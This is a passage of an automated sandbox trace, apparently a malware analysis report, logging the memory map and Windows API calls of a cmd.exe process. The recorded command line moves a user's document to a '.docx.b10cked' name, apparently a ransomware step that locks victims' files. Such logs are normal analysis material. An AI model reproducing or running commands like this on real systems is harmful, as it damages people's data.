filename = "" Region: id = 13599 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13600 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13601 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13602 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13603 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 13604 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13989 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13990 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13991 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 13992 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13993 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 13994 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13995 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13996 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13997 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13998 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13999 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14000 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14001 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14002 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14087 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 14088 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14089 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14090 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 14091 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 14092 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14093 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 14094 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 14095 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 14096 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 193 os_tid = 0xc28 [0136.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf8fc | out: lpSystemTimeAsFileTime=0x2cf8fc*(dwLowDateTime=0x8b27c0e0, dwHighDateTime=0x1d440a9)) [0136.260] GetCurrentProcessId () returned 0xc1c [0136.260] GetCurrentThreadId () returned 0xc28 [0136.260] GetTickCount () returned 0x2b135 [0136.260] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf8f4 | out: lpPerformanceCount=0x2cf8f4*=19304956544) returned 1 [0136.261] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.261] __set_app_type (_Type=0x1) [0136.261] __p__fmode () returned 0x76b331f4 [0136.261] __p__commode () returned 0x76b331fc [0136.261] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.261] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.262] GetCurrentThreadId () returned 0xc28 [0136.262] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc28) returned 0x38 [0136.262] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.262] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.262] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.321] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.321] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf88c | out: phkResult=0x2cf88c*=0x0) returned 0x2 [0136.322] VirtualQuery (in: lpAddress=0x2cf8c3, lpBuffer=0x2cf85c, dwLength=0x1c | out: lpBuffer=0x2cf85c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf85c, dwLength=0x1c | out: lpBuffer=0x2cf85c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf85c, dwLength=0x1c | out: lpBuffer=0x2cf85c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf85c, dwLength=0x1c | out: lpBuffer=0x2cf85c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf85c, dwLength=0x1c | out: lpBuffer=0x2cf85c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.322] GetConsoleOutputCP () returned 0x1b5 [0136.325] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.325] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.325] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.325] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.330] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.330] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.333] GetEnvironmentStringsW () returned 0xc0168* [0136.334] FreeEnvironmentStringsW (penv=0xc0168) returned 1 [0136.334] GetEnvironmentStringsW () returned 0xc0168* [0136.334] FreeEnvironmentStringsW (penv=0xc0168) returned 1 [0136.334] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7fc | out: phkResult=0x2ce7fc*=0x40) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x90, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x1, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x1, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x0, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x40, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x40, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x40, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.334] RegCloseKey (hKey=0x40) returned 0x0 [0136.334] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7fc | out: phkResult=0x2ce7fc*=0x40) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x40, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x1, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x1, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x0, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.335] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x9, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.335] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x4, lpData=0x2ce808*=0x9, lpcbData=0x2ce800*=0x4) returned 0x0 [0136.335] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce804, lpData=0x2ce808, lpcbData=0x2ce800*=0x1000 | out: lpType=0x2ce804*=0x0, lpData=0x2ce808*=0x9, lpcbData=0x2ce800*=0x1000) returned 0x2 [0136.335] RegCloseKey (hKey=0x40) returned 0x0 [0136.335] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.335] srand (_Seed=0x5b88636a) [0136.335] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked\"" [0136.335] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked\"" [0136.335] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.335] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xc18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.335] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.336] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.336] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.336] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.336] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.336] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.336] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.336] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.336] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.336] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.336] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.336] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.336] GetEnvironmentStringsW () returned 0xc22b8* [0136.336] FreeEnvironmentStringsW (penv=0xc22b8) returned 1 [0136.336] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.336] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.336] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.336] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.336] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.336] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.336] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.336] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.336] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.336] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.336] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf5c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.337] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf5c8, lpFilePart=0x2cf5c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf5c4*="Desktop") returned 0x18 [0136.337] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.337] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf344 | out: lpFindFileData=0x2cf344) returned 0xbfff8 [0136.337] FindClose (in: hFindFile=0xbfff8 | out: hFindFile=0xbfff8) returned 1 [0136.337] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf344 | out: lpFindFileData=0x2cf344) returned 0xbfff8 [0136.337] FindClose (in: hFindFile=0xbfff8 | out: hFindFile=0xbfff8) returned 1 [0136.337] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf344 | out: lpFindFileData=0x2cf344) returned 0xbfff8 [0136.337] FindClose (in: hFindFile=0xbfff8 | out: hFindFile=0xbfff8) returned 1 [0136.338] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.338] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.338] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.338] GetEnvironmentStringsW () returned 0xc2ad8* [0136.338] FreeEnvironmentStringsW (penv=0xc2ad8) returned 1 [0136.338] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.338] GetConsoleOutputCP () returned 0x1b5 [0136.368] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.368] GetUserDefaultLCID () returned 0x409 [0136.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf708, cchData=128 | out: lpLCData="0") returned 2 [0136.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf708, cchData=128 | out: lpLCData="0") returned 2 [0136.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf708, cchData=128 | out: lpLCData="1") returned 2 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.371] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.371] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.372] GetConsoleTitleW (in: lpConsoleTitle=0xb08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.384] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.384] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.384] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.384] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.385] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.385] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.385] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.385] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.385] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.385] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.385] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.387] GetConsoleTitleW (in: lpConsoleTitle=0x2cf400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.422] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.422] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.422] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.422] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.422] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.422] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.422] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.422] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.422] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.422] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.422] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.422] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.422] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.422] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.422] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.422] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.422] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.422] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.422] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.422] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.422] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.422] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.422] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.422] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.422] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.422] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.422] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.422] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.422] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.422] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.422] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.422] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.422] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.422] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.422] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.424] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf1bc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf1b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf1b4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.424] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.425] _wcsnicmp 